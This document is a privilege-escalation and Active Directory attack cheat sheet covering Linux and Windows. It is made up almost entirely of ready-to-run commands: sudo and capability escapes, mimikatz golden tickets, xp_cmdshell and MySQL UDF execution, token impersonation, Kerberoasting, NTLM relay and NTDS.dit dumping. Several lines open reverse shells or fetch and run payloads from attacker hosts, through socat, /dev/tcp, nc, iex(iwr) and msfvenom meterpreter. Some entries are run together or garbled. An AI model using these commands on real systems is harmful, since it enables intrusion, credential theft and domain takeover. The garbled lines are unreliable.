Abusing Sudo Binaries
Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Privileged Files
Methods:
- sudo vim -c ‘:!/bin/bash’
- sudo find / etc/passwd -exec /bin/bash \;
- echo “os.execute(‘/bin/bash/’)” > /tmp/shell.nse && sudo nmap –script=/tmp/shell.nse
- sudo env /bin/bash
- sudo awk ‘BEGIN {system(“/bin/bash”)}’
- sudo perl -e ‘exec “/bin/bash”;’
- sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’
- sudo less /etc/hosts – !bash
- sudo man man – !bash
- sudo ftp – ! /bin/bash
- Attacker = socat file:`tty`,raw,echo=0 tcp-listen:1234
- Victim = sudo socat exec:’sh -li’,pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234
- echo test > notes.txt
- sudo zip test.zip notes.txt -T –unzip-command=”sh -c /bin/bash”
- sudo gcc -wrapper /bin/bash,-s .
- sudo docker run -v /:/mnt –rm -it alpine chroot /mnt sh
- sudo mysql -e ‘\! /bin/sh’
- sudo ssh -o ProxyCommand=’;sh 0<&2 1>&2′ x
- Sudo tmux
- sudo pkexec /bin/bash
- sudo rlwrap /bin/bash
- sudo xargs -a /dev/null sh
- sudo /home/anansi/bin/anansi_util manual /bin/bash
- sudo apt-get update -o APT::Update::Pre-Invoke::=”/bin/bash -i”
- echo ‘import pty; pty.spawn(“/bin/bash”)’ > flask.py
- export FLASK_APP=flask.py
- sudo /usr/bin/flask run
- sudo apache2 -f /etc/shadow
john hash –wordlist=/usr/share/wordlists/rockyou.txt
Abusing Scheduled Tasks
Domain: Y/N
Local Admin: Yes
OS: Linux
Type: Abusing Scheduled Tasks
Methods:
- echo ‘chmod +s /bin/bash’ > /home/user/systemupdate.sh
- chmod +x /home/user/systemupdate.sh
- Wait a while
- /bin/bash -p
- id && whoami
Golden Ticket With Scheduled Tasks
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abusing Scheduled Tasks
Methods:
1.mimikatz# token::elevate
2.mimikatz# vault::cred /patch
3.mimikatz# lsadump::lsa /patch
4.mimikatz# kerberos::golden /user:Administrator /rc4:<Administrator NTLM(step 3)> /domain:<DOMAIN> /sid:<USER SID> /sids:<Administrator SIDS> /ticket:<OUTPUT TICKET PATH>
5.powercat -l -v -p 443
6.schtasks /create /S DOMAIN /SC Weekly /RU “NT Authority\SYSTEM” /TN “enterprise” /TR “powershell.exe-c ‘iex (iwr http://10.10.10.10/reverse.ps1)’”
7.schtasks /run /s DOMAIN /TN “enterprise”
Abusing Interpreter Capabilities
Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Capabilities
Methods:
- getcap -r / 2>/dev/null
- /usr/bin/python2.6 = cap_setuid+ep
- /usr/bin/python2.6 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’
- id && whoami
- getcap -r / 2>/dev/null
- /usr/bin/perl = cap_setuid+ep
- /usr/bin/perl -e ‘use POSIX (setuid); POSIX::setuid(0); exec “/bin/bash”;’
- id && whoami
Abusing Binary Capabilities
Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Capabilities
Methods:
- getcap -r / 2>/dev/null
- /usr/bin/tar = cap dac read search+ep
- /usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
- /usr/bin/tar -xvf key.tar
- openssl req -engine /tmp/priv.so
- /bin/bash -p
- id && whoami
Abusing ActiveSessions Capabilities
Domain: No
Local Admin: Yes
OS: Windows
Type: Abusing Capabilities
Methods:
. .\Heidi.ps1
Invoke-SQLOCmd -Verbose -Command “net localgroup administrators user1 /add” -Instance COMPUTERNAME
Escalate with TRUSTWORTHY in SQL Server
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abusing Capabilities
Methods:
1. . .\PowerUpSQL.ps1
2. Get-SQLInstanceLocal -Verbose
3. (Get-SQLServerLinkCrawl -Verbos -Instance “10.10.10.10” -Query ‘select * from master..sysservers’).customer.query
4.
USE “master”;
SELECT *, SCHEMA_NAME(“schema_id”) AS ‘schema’ FROM “master”.”sys”.”objects” WHERE “type” IN (‘P’, ‘U’, ‘V’, ‘TR’, ‘FN’, ‘TF, ‘IF’);
execute(‘sp_configure “xp_cmdshell”,1;RECONFIGURE’) at “<DOMAIN>\<DATABASE NAME>”
5. powershell -ep bypass
6. Import-Module .\powercat.ps1
7. powercat -l -v -p 443 -t 10000
8.
SELECT *, SCHEMA_NAME(“schema_id”) AS ‘schema’ FROM “master”.”sys”.”objects” WHERE “type” IN (‘P’, ‘U’, ‘V’, ‘TR’, ‘FN’, ‘TF, ‘IF’);
execute(‘sp_configure “xp_cmdshell”,1;RECONFIGURE’) at “<DOMAIN>\<DATABASE NAME>”
execute(‘exec master..xp_cmdshell “\\10.10.10.10\reverse.exe”‘) at “<DOMAIN>\<DATABASE NAME>”
Abusing Mysql run as root
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abusing Services
Methods:
- ps aux | grep root
mysql -u root -p
\! chmod +s /bin/bash
Exit
/bin/bash -p
id && whoami
Abusing journalctl
Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Services
Methods:
- Journalctl
- !/bin/sh
Abusing VDS
Domain: No
Local Admin: Yes
OS: Windows
Type: Abusing Services
Methods:
. .\PowerUp.ps1
Invoke-ServiceAbuse -Name ‘vds’ -UserName ‘domain\user1’
Abusing Browser
Domain: No
Local Admin: Yes
OS: Windows
Type: Abusing Services
Methods:
. .\PowerUp.ps1
Invoke-ServiceAbuse -Name ‘browser’ -UserName ‘domain\user1’
Abusing LDAP
Domain: Yes
Local Admin: Yes
OS: Linux
Type: Abusing Services
Methods:
0. exec ldapmodify -x -w PASSWORD
1. paste this
dn: cn=openssh-lpk,cn=schema,cn=config
objectClass: olcSchemaConfig
cn: openssh-lpk
olcAttributeTypes: ( 1.3.6.1.4.1.24552.500.1.1.1.13 NAME ‘sshPublicKey’
DESC ‘MANDATORY: OpenSSH Public key’
EQUALITY octetStringMatch
SYNTAX 1.3.6.1.4.1.1466.115.121.1.40 )
olcObjectClasses: ( 1.3.6.1.4.1.24552.500.1.1.2.0 NAME ‘ldapPublicKey’ SUP top AUXILIARY
DESC ‘MANDATORY: OpenSSH LPK objectclass’
MAY ( sshPublicKey $ uid )
)
2. exec ldapmodify -x -w PASSWORD
3. paste this
dn: uid=UID,ou=users,ou=linux,ou=servers,dc=DC,dc=DC
changeType: modify
add: objectClass
objectClass: ldapPublicKey
–
add: sshPublicKey
sshPublicKey: content of id_rsa.pub
–
replace: EVIL GROUP ID
uidNumber: CURRENT USER ID
–
replace: EVIL USER ID
gidNumber: CURRENT GROUP ID
LLMNR Poisoning
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Abuse Service
Methods:
1.responder -I eth1 -v
2.create Book.url
[InternetShortcut]
IconIndex=0
IconFile=\\attacker_ip\not_found.ico
Abusing Certificate Services
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Abuse Service
Methods:
adcspwn.exe –adcs <cs server> –port [local port] –remote [computer]
adcspwn.exe –adcs cs.pwnlab.local
adcspwn.exe –adcs cs.pwnlab.local –remote dc.pwnlab.local –port 9001
adcspwn.exe –adcs cs.pwnlab.local –remote dc.pwnlab.local –output C:\Temp\cert_b64.txt
adcspwn.exe –adcs cs.pwnlab.local –remote dc.pwnlab.local –username pwnlab.local\mranderson –password The0nly0ne! –dc dc.pwnlab.local
MySQL UDF Code Injection
Domain: Yes
Local Admin: Yes
OS: Linux
Type: Injection
Methods:
mysql -u root -p
mysql> use mysql;
mysql> create table admin(line blob);
mysql> insert into admin values(load_file(‘/tmp/lib_mysqludf_sys.so’));
mysql> select * from admin into dumpfile ‘/usr/lib/lib_mysqludf_sys.so’;
mysql> create function sys_exec returns integer soname ‘lib_mysqludf_sys.so’;
mysql> select sys_exec(‘bash -i >& /dev/tcp/10.10.10.10/9999 0>&1’);
Impersonation Token with ImpersonateLoggedOnuser
Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
Methods:
1.SharpImpersonation.exe user:<user> shellcode:<URL>
2.SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
Impersonation Token with SeImpersontePrivilege
Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
Methods:
1.execute-assembly sweetpotato.exe -p beacon.exe
Impersonation Token with SeLoadDriverPrivilege
Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
Methods:
1.EOPLOADDRIVER.exe System\\CurrentControlSet\\MyService C:\\Users\\Username\\Desktop\\Driver.sys
OpenVPN Credentials
Domain: No
Local Admin: Yes
OS: Linux
Type: Enumeration & Hunt
Methods:
locate *.ovpn
Bash History
Domain: No
Local Admin: Yes
OS: Linux
Type: Enumeration & Hunt
Methods:
- history
cat /home/<user>/.bash_history
cat ~/.bash_history | grep -i passw
Package Capture
Domain: No
Local Admin: Yes
OS: Linux
Type: Sniff
Methods:
locate:
- tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P ‘pwd=’
NFS Root Squashing
Domain: Yes
Local Admin: Yes
OS: Linux
Type: Remote Procedure Calls (RPC)
Methods:
- showmount -e <victim_ip>
mkdir /tmp/mount
mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
cd /tmp/mount
cp /bin/bash .
chmod +s bash
Abusing Access Control List
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
- $user = “megacorp\jorden”
$folder = “C:\Users\administrator”
$acl = get-acl $folder
$aclpermissions = $user, “FullControl”, “ContainerInherit, ObjectInherit”, “None”, “Allow”
$aclrule = new-object System.Security.AccessControl.FileSystemAccessRule $aclpermissions
$acl.AddAccessRule($aclrule)
set-acl -path $folder -AclObject $acl
get-acl $folder | folder
Escalate With SeBackupPrivilege
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit
Escalate With SeImpersonatePrivilege
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
printspoofer.exe -i -c “powershell -c whoami”
Escalate With SeLoadDriverPrivilege
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
FIRST:
Download https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
Download https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp
Download https://github.com/tandasat/ExploitCapcom
change ExploitCapcom.cpp line 292
TCHAR CommandLine[] = TEXT(“C:\\Windows\\system32\\cmd.exe”);
to
TCHAR CommandLine[] = TEXT(“C:\\test\\shell.exe”);
then compile ExploitCapcom.cpp and eoploaddriver.cpp to .exe
SECOND:
1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe
2. .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
3. .\ExploitCapcom.exe
4. in msf exec `run`
Escalate With ForceChangePassword
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
Import-Module .\PowerView_dev.ps1
Set-DomainUserPassword -Identity user1 -verbose
Enter-PSSession -ComputerName COMPUTERNAME -Credential “”
Escalate With GenericWrite
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
$pass = ConvertTo-SecureString ‘Password123#’ -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential(‘DOMAIN\MASTER USER’), $pass)
Set-DomainObject -Credential $creds USER1 -Clear serviceprincipalname
Set-DomainObject -Credential $creds -Identity USER1 -SET @{serviceprincipalname=’none/fluu’}
.\Rubeus.exe kerberoast /domain:<DOMAIN>
Abusing GPO
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1..\SharpGPOAbuse.exe –AddComputerTask –Taskname “Update” –Author DOMAIN\<USER> –Command “cmd.exe” –Arguments “/c net user Administrator Password!@# /domain” –GPOName “ADDITIONAL DC CONFIGURATION”
Pass-the-Ticket
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Abuse Ticket
Methods:
1..\Rubeus.exe asktgt /user:<USET>$ /rc4:<NTLM HASH> /ptt
2.klist
Golden Ticket
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Abuse Ticket
Methods:
1.mimikatz # lsadump::dcsync /user:<USER>
2.mimikatz # kerberos::golden /user:<USER> /domain:</DOMAIN> /sid:<OBJECT SECURITY ID> /rce:<NTLM HASH> /id:<USER ID>
Abusing Splunk Universal Forwarder
Domain: No
Local Admin: Yes
OS: Linux/Windows
Type: Abuse Channel
Methods:
python PySplunkWhisperer2_remote.py –lhost 10.10.10.5 –host 10.10.15.20 –username admin –password admin –payload ‘/bin/bash -c “rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.10.5 5555 >/tmp/luci11″‘
Abusing Gdbus
Domain: No
Local Admin: Yes
OS: Linux/Windows
Type: Abuse Channel
Methods:
gdbus call –system –dest com.ubuntu.USBCreator –object-path /com/ubuntu/USBCreator –method com.ubuntu.USBCreator.Image /home/nadav/authorized_keys /root/.ssh/authorized_keys true
Abusing Trusted DC
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Abuse Channel
Methods:
- Find user in First DC
- If port 6666 enabled
- proxychains evil-winrm -u user -p ‘pass’ -i 10.100.9.253 -P 6666
- . \mimikatz. exe “privilege:: debug” “sekurlsa:: logonpasswords” “token:: elevate” *lsadump:: secrets* *exit”
- proxychains evil-winrm -u Administrator -p ‘pass dumped in step 4’ -i 10.100.10.100 -P 6666
NTLM Relay
Domain: Yes
Local Admin: Y/N
OS: Windows
Methods:
responder -I eth1 -v
ntlmrelayx.py …
Exchange Relay
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: NTLM
Methods:
./exchangeRelayx.py …
Dumping with diskshadow
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Dumping
Methods:
1. priv.txt contain
SET CONTEXT PERSISTENT NOWRITERSp
add volume c: alias 0xprashantp
createp
expose %0xprashant% z:p
2. exec with diskshadow /s priv.txt
Dumping with vssadmin
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Dumping
Methods:
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy./kerbrute_linux_amd64 passwordspray -d domain.local –dc 10.10.10.10 domain_users.txt Password123
Password Spraying
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Spraying
Methods:
./kerbrute_linux_amd64 passwordspray -d domain.local –dc 10.10.10.10 domain_users.txt Password123
AS-REP Roasting
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Kerberos
Methods:
.\Rubeus.exe asreproast
Kerberoasting
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Kerberos
Methods:
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
crackmapexec ldap 10.0.2.11 -u ‘username’ -p ‘password’ –kdcHost 10.0.2.11 –kerberoast output.txt